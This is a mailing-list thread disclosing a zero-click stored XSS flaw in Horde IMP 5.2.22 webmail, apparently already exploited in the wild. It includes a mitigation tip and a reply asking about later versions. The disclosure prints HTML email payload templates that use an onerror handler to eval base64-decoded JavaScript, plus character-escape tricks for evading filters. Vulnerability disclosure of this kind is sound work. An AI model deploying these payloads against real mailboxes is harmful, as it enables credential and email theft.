[imp] Horde v 5.2.22 vulnerability – obfuscation via HTML encoding – XSS payload

Fri Mar 21 09:40:14 UTC 2025

Hi,

is Horde 5.2.23 / 5.2.24 affected?

azurit

Citát "Nataša K. Arh" <natasa.jakec at gmail.com>:

> Hi.
>
> I forgot to mention that currently the fastest way to mitigate the
> vulnerability is to disable HTML email view and enable only text/plain view
> of the email content.
>
>
> Regards, Tasha & Vito
>
> On Fri, Mar 21, 2025 at 9:18 AM Nataša K. Arh <natasa.jakec at gmail.com>
> wrote:
>
>> Hi.
>>
>> A vulnerability within Horde Web Client was discovered during our
>> investigation. We have already seen this vulnerability being exploited in
>> the wild.
>>
>> If an attacker crafts a specially prepared email, he/she can abuse this
>> vulnerability to retrieve username, password and complete email database
>> of a user mailbox.
>>
>>
>> *Details*
>>
>> The content inside email header base64 encoded text/html boundary contains
>> a specially crafted HTML.
>>
>>
>> --===============boundary==
>>
>> Content-Type: text/html; charset="utf-8"
>>
>> Content-Transfer-Encoding: base64
>>
>> MIME-Version: 1.0
>>
>>
>> Injecting a XSS payload inside an HTML attribute, namely the “onerror”
>> event handler, the server-side checks does not sanitize the payload and
>> does not detect HTML encoded characters.
>>
>> When the browser renders the page, it will decode and execute the injected
>> payload.
>>
>> This is injected at the end of the legit HTML content.
>>
>>
>> Example:
>>
>> <html>
>>
>> <body>
>>
>> <p>Hi...</p>
>>
>> Regards<br>
>>
>> *<math><style>*
>>
>> *<img style=display:none src=nonexsisting.png
>> onerror="window.parent.eval(window.parent.atob('base64 encoded
>> JavaScript'));">*
>>
>> *</style></math>*
>>
>> </body></html>
>>
>>
>> To evade detection Unicode characters can be used:
>> For eval:
>> - \u{065} represents the Unicode character for the letter "e."
>> - \u{076} represents the Unicode character for the letter "v."
>> - \141 (octal) or \x6C (hexadecimal) represents the letter "a."
>> - \x6C represents the hexadecimal for the letter "l."
>>
>> For atob:
>> - \u{61} represents the Unicode character for the letter "a."
>> - \u{74} represents the Unicode character for the letter "t."
>> - o is a regular character.
>> - \142 (octal) represents the letter "b."
>>
>> Example:
>>
>> <html>
>> <body>
>> <p>Hi...</p>
>> Regards<br>
>> *<math><style><img style=display:none **src=nonexsisting.png*
>> *  
>> onerror="window.parent['\u{065}\u{076}\141\x6C'](window.parent['\u{61}\u{74}o\142']('base64
>> encoded JavaScript'))"></style></math>*
>> </body></html>
>>
>> The “nonexsisting.png” image is searched inside /imp, since it does not
>> exist the “onerror” content is executed.
>>
>> A specially crafted JavaScript code inside the *'base64 encoded
>> JavaScript'* is executed.
>>
>> This kind of crafted email is a zero-click attack, where no click is
>> needed from a user side other then looking this email in the Horde web
>> client.
>>
>> Since there are still Horde web clients used, it would be nice to fix this
>> vulnerability.
>>
>>
>>
>> --
>> Regards.
>>
> --
> imp mailing list
> Frequently Asked Questions: http://wiki.horde.org/FAQ
> To unsubscribe, mail: imp-unsubscribe at lists.horde.org